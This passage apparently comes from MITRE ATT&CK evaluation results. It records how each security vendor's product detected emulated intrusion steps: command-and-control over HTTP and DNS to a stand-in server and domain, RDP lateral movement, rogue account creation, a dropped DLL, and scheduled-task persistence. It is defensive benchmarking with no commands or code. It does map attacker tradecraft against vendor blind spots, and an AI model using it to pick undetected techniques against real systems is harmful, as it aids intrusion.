Telemetry showed the execution sequence of reg.exe executing with command-line arguments. The telemetry was tainted by the relationship to prior rundll32.exe activity based on process injection alert context. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Enrichment (Tainted)
The capability enriched the execution of reg.exe as querying a remote key. The data was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Enrichment
The capability enriched reg.exe executing with the correct ATT&CK Technique (Query Registry). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
Telemetry
Telemetry showed cmd.exe executing reg.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by the activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched the network connections from rundll32.exe with the correct ATT&CK Technique (T1043 - Commonly Used Port). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed network connections over TCP port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry showed a connection over TCP port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed rundll32.exe opening a connection over port 80. The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched rundll32.exe opening a connection to the C2 server over a "HTTP port" with the correct ATT&CK Tactic (Command and Control) and the Technique (Commonly Used Port). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed a TCP port 80 connection from rundll32.exe to 192.168.0.4 (C2 server). The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified C2 communication over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry
Telemetry showed a connection over port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed network connections over port 80 to 192.168.0.4 (C2 server) initiated from rundll32.exe. [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed an outbound network connection from rundll32.exe to 192.168.0.4 (C2 server) over TCP port 80. The telemetry was tainted by the parent "Sponsor Process Established Network Connection" alert. [1] [2] [3]
McAfee
Telemetry
Telemetry showed connections over TCP port 80 to freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4] [5]
Enrichment
The capability enriched rundll32.exe (the process that made the network connection) with the correct ATT&CK Tactic (Command and Control) and the Technique (Commonly Used Port). [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for rundll32.exe opening a connection to 192.186.0.4 (C2 server) over port 80. The telemetry was tainted by the relationship to the previous alert on unexpected behavior originating from rundll32.exe. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry
Telemetry showed port 80 command and control traffic. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
RSA
Telemetry
Telemetry showed connections over TCP port 80 to freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed a port 80 connection to 192.168.0.4 (C2 server) that was associated with the rundll32 parent process. The telemetry was tainted by the activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed network connections over TCP port 80 as well as a modload showing winhttp.dll was loaded, which an analyst could use to determine HTTP was used. [1] [2] [3]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to 192.168.0.4 (C2 server) on port 80 (no detection showed HTTP specifically). [1] [2] [3] [4] [5] [6]
Cybereason
Enrichment (Tainted)
The capability enriched rundll32.exe opening an unusual network connection to the C2 server over the port 80 "HTTP port". The data was tagged with the correct ATT&CK Tactic (Command and Control) and Technique (Standard Application Layer Protocol), and also showed the amount of transmitted/received bytes as well as that the winhttp.dll module was loaded (which an analyst could use to determine HTTP was used). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to port 80 (no detection showed HTTP specifically). [1] [2] [3] [4] [5]
FireEye
Telemetry
Telemetry showed HTTP GET requests over port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified C2 communication over HTTP to www.freegoogleadsenseinfo.com (C2 domain). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a trace of HTTP connections being made by rundll32.exe to freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4] [5]
GoSecure
Telemetry
Telemetry showed an outbound HTTP request to www.freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4]
McAfee
Telemetry
Telemetry showed network connections over TCP port 80 and that winhttp.dll module was loaded into the same process (PID 6276) that made the network connection, which an analyst could use to determine HTTP was used. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to port 80 (no detection showed HTTP specifically). [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry
Telemetry showed port 80 command and control traffic as well as the loading of winhttp.dll, which an analyst could use to determine HTTP was used. [1] [2]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to TCP port 80 (no detection showed HTTP specifically). [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. Telemetry showed a connection to port 80 (no detection showed HTTP specifically). [1] [2]
Carbon Black
Telemetry
Telemetry showed separate network connections over TCP port 80 and UDP port 53, which could indicate multiband communication. [1] [2]
CrowdStrike
Telemetry (Tainted)
Telemetry showed connections over both DNS and TCP port 80, which could indicate multiband communication. The DNS connections were tainted by a parent Exfiltration alert. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed the same rundll32.exe opening a connection over port 80 while making DNS queries to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process. [1]
Endgame
Telemetry (Tainted)
Telemetry showed connections over DNS as well as over port 80, which could indicate multiband communication. The telemetry was tainted by a parent Malicious File Detection alert. [1] [2]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified C2 communication over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain) in addition to the ongoing DNS C2. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2]
Telemetry
Telemetry showed a combination of both DNS requests as well as HTTP requests, which could indicate multiband communication. [1] [2]
F-Secure
Telemetry
Telemetry showed rundll32.exe making network connections over port 80 to 192.168.0.4 (C2 server) as well as earlier identified DNS queries, which could indicate multiband communication. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed C2 traffic was over TCP port 80 as well as earlier traffic over DNS, which could indicate multiband communication. The HTTP telemetry over TCP port 80 was tainted by the parent "Sponsor Process Established Network Connection" alert. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
Telemetry (Tainted)
Telemetry showed an execution sequence for rundll32.exe opening a connection to 192.168.0.4 (C2 server) over port 80, and prior activity showed DNS traffic to the same C2 IP address, which could indicate multiband communication. The port 80 telemetry was tainted by the relationship to the previous alert on unexpected behavior originating from rundll32.exe. [1] [2] [3]
Palo Alto Networks
Telemetry
Telemetry showed command and control traffic for both ports 80 and 53. [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed port 80 connections to 192.168.0.4 (C2 server) and DNS requests for freegoogleadsenseinfo.com (C2 domain), which could indicate multiband communication. The telemetry was tainted by the activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Enrichment
The capability enriched the rdpclip.exe events with the correct ATT&CK Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry
Telemetry showed a connection to 10.0.0.5 (Conficker) over TCP port 3389 as well as rdpclip.exe executing. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry
Telemetry showed a connection for logon type 10 (interactive logon) and a connection to 10.0.0.5 (Conficker) over TCP port 3389. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because they identified suspicious communications over port 3389 (RDP) to other hosts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) with Remote Interactive Logon Type. The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process. Telemetry also showed rdpclip.exe executing on 10.0.0.5 (Conficker). [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed a connection over port 3389 to 10.0.0.5 (Conficker) as well as a Type 10 (interactive remote) login event by user George on Conficker. The port 3389 telemetry was tainted by a parent Process Injection alert. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched the RDP connection from rundll32.exe with an alert for RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed rundll32.exe making network connections to 10.0.0.5 (Conficker) over port 3389. [1] [2] [3]
GoSecure
Telemetry
Telemetry also identified an inbound connection to Conficker over TCP port 3389. [1] [2] [3] [4]
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe creating an outbound TCP port 3389 (RDP) connection from Nimda and enriched the connection with the conditions Lateral Movement and Remote Share Access. The enrichment was tainted by the parent "Windows command prompt invoked" alert. At least one condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4]
McAfee
Enrichment
The capability enriched rundll32.exe (the process that made the network connection) with the correct ATT&CK Tactic (Lateral Movement) and the Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry
Telemetry showed a connection to 10.0.0.5 (Conficker) over TCP port 3389. [1] [2] [3] [4] [5]
Microsoft
Telemetry
Telemetry showed the execution sequence for cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker). Logon activity over the last 30 days on Conficker showed George with a logon type 10 RemoteInteractive logon event. Telemetry also showed George logged into Conficker and displayed a movement graph of activity from user account Debbie to George. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker). The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5]
General Behavior (Tainted)
A General Behavior alert was generated for an unexpected process using the RDP port. The data was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed cmd.exe connecting to 10.0.0.5 (Conficker) over port 3389. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed a port 3389 connection. The telemetry was tainted by the activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed Registry modification events related to the creation of the user account Jesse. [1] [2]
Enrichment (Configuration Change)
The capability enriched lsass.exe with the tag "Create Accounts using GUI". The enrichment was added as a configuration change during the action and was not part of the original set of detections when the evaluation started. [1] [2]
CrowdStrike
Telemetry
Telemetry showed the creation of the user Jesse and the user being added to the domain admin group. [1] [2] [3]
Cybereason
Telemetry
Telemetry showed lsass.exe creating a Registry key for user Jesse, indicating that the user is new. [1]
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
Telemetry
Telemetry from Conficker showed the creation of the new user Jesse. [1] [2]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the creation of a local user account for Jesse on Conficker. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2]
F-Secure
Telemetry
Telemetry showed the creation of the new user Jesse. [1]
GoSecure
Specific Behavior (Configuration Change)
A Specific Behavior alert named "New user account created" was generated based on the Registry change identifying that the new user Jesse was created. A child event of the alert indicated that the account had been added to the local admins group (but did not identify the account creation specifically). This alert was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2]
McAfee
Telemetry
Telemetry showed the creation of the user Jesse. [1]
Microsoft
Telemetry (Configuration Change)
Telemetry showed data for the creation of account Jesse after a configuration change to enable collection of event ID 4720. Visibility of account creation data was verified in retesting at the end of the evaluation after the vendor adjusted the data collection configuration. [1]
Palo Alto Networks
Enrichment
The capability enriched the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Create Account). [1] [2]
Telemetry
Telemetry showed mmc.exe creating a Registry key for user Jesse, indicating that the user is new. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry
Telemetry showed the creation of the user Jesse which was noted from SAM Registry events. [1]
Carbon Black
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
CrowdStrike
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Cybereason
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Endgame
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
FireEye
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
F-Secure
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in) (tainted by the parent "LSA Registry Key modified" alert). [1]
McAfee
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Microsoft
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Palo Alto Networks
Enrichment
The capability enriched the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Graphical User Interface). [1] [2]
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in), which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in), which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. The telemetry was tainted by the parent "LSA Registry Key modified" alert. [1] [2] [3] [4] [5]
McAfee
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Enrichment
The capability enriched mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in) as reconnaissance via the MMC utility with local users and groups view. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Telemetry
Telemetry showed file modification events indicating updater.dll being created and written to disk. [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed the file write for updater.dll into the system32 folder by user George. The telemetry was tainted by the parent "unexpected process" alert. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed the creation of updater.dll. Telemetry was tainted by a parent alert on cmd.exe (listed as the owner process) generated based on updater.dll being detected as known malware. [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry (Tainted)
Telemetry showed the creation of updater.dll (tainted by the parent Malicious File Detection). [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched updater.dll being written by cmd.exe with an alert for CMD File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and a related ATT&CK Technique (T1059 - Command-Line Interface) and Tactic (Execution). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed the file write for updater.dll into the system32 folder. The telemetry was tainted by the parent AV signature alert for updater.dll. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Enrichment
The capability enriched the creation of updater.dll identifying that a command prompt modified an unknown DLL. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed creation of updater.dll. The telemetry was tainted by the parent "Powershell process created" alert. [1] [2] [3] [4] [5] [6]
McAfee
Specific Behavior
A Specific Behavior alert was generated for a new dynamic library created in the Windows system (System32) folder. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
A Specific Behavior alert was generated for a new PE file created in the Windows system (System32) folder. [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry
Telemetry showed cmd.exe writing updater.dll to disk. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Specific Behavior
A Specific Behavior alert was generated for a Windows scripting engine creating an executable on disk. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a script engine creating/writing a DLL in the system32 folder. The alert was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry
Telemetry showed the file create event for updater.dll. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
Telemetry
Telemetry showed file write of updater.dll. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed file write of updater.dll. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6]
Carbon Black
Specific Behavior
A Specific Behavior alert was generated mapped to the correct ATT&CK Technique (T1053 - Scheduled Task). [1] [2] [3] [4]
Telemetry
Telemetry showed the process tree containing schtasks.exe as well as the full command-line arguments. [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry showed the creation of the scheduled task. [1] [2] [3] [4]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a scheduled task was created for persistence. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the creation of the scheduled task was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4]
Cybereason
Enrichment
The capability enriched schtasks.exe creating the Resume Viewer Update Checker scheduled task as reboot persistence and as SYSTEM. The data was also mapped to the correct ATT&CK Tactic (Persistence). [1] [2] [3] [4]
Telemetry
Telemetry showed the Resume Viewer Update Checker scheduled task. [1] [2] [3] [4]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched the event tree with the correct ATT&CK Technique (T1053 - Scheduled Task) and Tactic (Persistence) (tainted by parent Malicious File Detection alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Enrichment
The capability enriched data from a hunt for persistence via scheduled task, which showed the "Resume Viewer Update Checker" scheduled task. [1] [2] [3] [4] [5]
Specific Behavior (Tainted)
A Specific Behavior alert for "Persistence-Scheduled Task Creation" was generated (tainted by parent Malicious File Detection alert). The alert was also mapped to the correct ATT&CK Technique (T1053 - Scheduled Task) and Tactic (Persistence). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showing creation of the scheduled task was also visible in an event tree (tainted by parent Malicious File Detection alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that updater.dll persisted through the creation of a scheduled task. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched schtasks.exe with an alert for Scheduled Task Activity (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1053 - Scheduled Task) and Tactics (Execution, Persistence, and Privilege Escalation). [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed cmd.exe registering the "Resume Viewer Update Checker" scheduled task. [1] [2]
GoSecure
Specific Behavior
A Specific Behavior alert called "Schtasks with create command" was generated due to a schtasks.exe process create from cmd.exe. [1] [2]
Telemetry
Telemetry within the Schtasks alert showed a process creation of schtasks.exe from cmd.exe, and would be available in a separate view. For this alert, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe creating the "Resume Viewer Update Checker" scheduled task via schtasks.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated for a task being created that runs an executable (via rundll32) under system rights at Windows logon. The alert was tagged with the correct ATT&CK Tactics (Execution, Persistence, Privilege Escalation) and Technique (Scheduled Task). [1] [2] [3]
Microsoft
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated on a low-reputation DLL persisting through a scheduled task. [1] [2] [3]
Telemetry
Telemetry showed cmd.exe registering the "Resume Viewer Update Checker" scheduled task. [1] [2] [3]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for the creation of a new scheduled task. The alert was tainted by a parent process injection alert on cmd.exe. Vendor stated the capability would have prevented the creation of the scheduled task. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched schtasks.exe creating the Resume Viewer Update Checker scheduled task with the correct ATT&CK Technique (Scheduled Task). [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a commonly abused host process scheduling a task. The alert was tainted by a parent process injection alert on cmd.exe. Vendor stated the capability would have prevented the creation of the scheduled task. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed schtasks.exe creating the Resume Viewer Update Checker scheduled task as reboot persistence and as SYSTEM. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed the execution of schtasks.exe as well as the full command-line arguments. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of schtasks.exe and associated command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed cmd.exe executing dir with command-line arguments. [1] [2] [3] [4]
Enrichment
The capability enriched cmd.exe with the correct ATT&CK Technique (T1083 - File and Directory Discovery). [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe running dir. The process tree view showed the cmd.exe process that ran dir as tainted by a prior detection. [1] [2] [3] [4] [5] [6]
Cybereason
Enrichment (Tainted)
The capability enriched cmd.exe executing dir with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2]
Telemetry
Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched dir with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery). The enrichment was also tainted by a parent Malicious File Detection. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry within an event tree (tainted by a parent Malicious File Detection) showed cmd.exe executing dir with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched cmd.exe executing dir with an alert for Dir Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery). [1] [2] [3] [4]
F-Secure
Enrichment
The capability enriched cmd.exe executing the dir command indicating that the parameter was a directory listing of a network drive associated with potential reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running dir) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing dir) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
Telemetry (Tainted)
Telemetry showed that svchost.exe created cmd.exe, which executed dir. The telemetry was tainted by the parent "Powershell process created" alert. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing the dir command. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Enrichment
The capability enriched cmd.exe executing the dir command with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for cmd.exe executing dir with command-line arguments. The telemetry was tainted by a prior alert on rundll32.exe being executed without command-line arguments. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Tainted)
The capability enriched cmd.exe executing dir with command-line arguments as the execution of the dir command on a network location. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
A General Behavior alert was generated for a commonly abused process (cmd.exe) spawning out of rundll32.exe. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
Telemetry
Telemetry showed cmd.exe executing dir with command-line arguments. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry was tainted by the activity seen during the initial compromise step because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed cmd.exe executing tree.com with command-line arguments. [1] [2] [3] [4]
Enrichment
The capability enriched tree.com with the correct ATT&CK Technique (T1083 - File and Directory Discovery). [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe running tree with command-line arguments. The process tree view also showed the cmd.exe that was the parent for tree.com as tainted by a prior detection. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed, Tainted)
